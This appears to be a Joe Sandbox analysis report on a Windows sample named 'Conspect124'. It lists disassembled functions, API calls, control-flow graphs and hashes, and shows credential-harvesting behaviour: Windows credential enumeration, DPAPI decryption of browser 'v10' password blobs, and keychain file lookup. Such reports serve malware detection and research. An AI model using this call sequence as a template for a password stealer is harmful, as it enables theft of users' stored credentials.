                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                      • memset.MSVCRT ref: 00413D7F
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                      • memset.MSVCRT ref: 00413E07
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                      • free.MSVCRT ref: 00413EC1
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                      • API String ID: 1344430650-1740548384
                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                      Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                      • String ID: AE$BIN
                                      • API String ID: 1668488027-3931574542
                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                      Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 767404330-0
                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0041898C
                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: InfoSystemmemset
                                      • String ID:
                                      • API String ID: 3558857096-0
                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 41 445823-445826 14->41 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 50 445879-44587c 18->50 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 32 445605-445607 22->32 33 445603 22->33 30 4459f2-4459fa 23->30 31 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->31 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 43 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 30->43 44 445b29-445b32 30->44 145 4459d0-4459e8 call 40b6ef 31->145 146 4459ed 31->146 32->21 37 445609-44560d 32->37 33->32 37->21 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 37->48 38->3 39->38 51 44584c-445854 call 40b1ab 41->51 52 445828 41->52 182 445b08-445b15 call 40ae51 43->182 53 445c7c-445c85 44->53 54 445b38-445b96 memset * 3 44->54 156 445665-445670 call 40b1ab 48->156 157 445643-445663 call 40a9b5 call 4087b3 48->157 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 82 445fae-445fb2 60->82 83 445d2b-445d3b 60->83 160 445cf5 61->160 161 445cfc-445d03 61->161 64->19 75 445884-44589d call 40a9b5 call 4087b3 65->75 143 445849 66->143 249 445c77 67->249 68->67 76 445ba2-445bcf call 4099c6 call 445403 call 445389 68->76 148 44589f 75->148 76->53 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 110 4456ba-4456c4 78->110 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 193 445e17 99->193 194 445e1e-445e25 99->194 123 4457f9 110->123 124 4456ca-4456d3 call 413cfa call 413d4c 110->124 123->6 174 4456d8-4456f7 call 40b2cc call 413fa6 124->174 140->141 141->23 143->51 145->146 146->30 148->64 150->78 150->93 156->110 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->60 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 193->194 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 194->198 199 445e6b-445e7e call 445093 194->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->44 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 254 445f9b 220->254 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->53 254->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                      APIs
                                      • memset.MSVCRT ref: 004455C2
                                      • wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 0044570D
                                      • memset.MSVCRT ref: 00445725
                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      • memset.MSVCRT ref: 0044573D
                                      • memset.MSVCRT ref: 00445755
                                      • memset.MSVCRT ref: 004458CB
                                      • memset.MSVCRT ref: 004458E3
                                      • memset.MSVCRT ref: 0044596E
                                      • memset.MSVCRT ref: 00445A10
                                      • memset.MSVCRT ref: 00445A28
                                      • memset.MSVCRT ref: 00445AC6
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      • memset.MSVCRT ref: 00445B52
                                      • memset.MSVCRT ref: 00445B6A
                                      • memset.MSVCRT ref: 00445C9B
                                      • memset.MSVCRT ref: 00445CB3
                                      • _wcsicmp.MSVCRT ref: 00445D56
                                      • memset.MSVCRT ref: 00445B82
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                      • memset.MSVCRT ref: 00445986
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                      • API String ID: 1963886904-3798722523
                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                      Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                      • String ID: $/deleteregkey$/savelangfile
                                      • API String ID: 2744995895-28296030
                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                      Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                      • wcsrchr.MSVCRT ref: 0040B738
                                      • memset.MSVCRT ref: 0040B756
                                      • memset.MSVCRT ref: 0040B7F5
                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                      • memset.MSVCRT ref: 0040B851
                                      • memset.MSVCRT ref: 0040B8CA
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                      • memset.MSVCRT ref: 0040BB53
                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                      • String ID: chp$v10
                                      • API String ID: 1297422669-2783969131
                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                                      APIs
                                      • memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                      • String ID:
                                      • API String ID: 3715365532-3916222277
                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
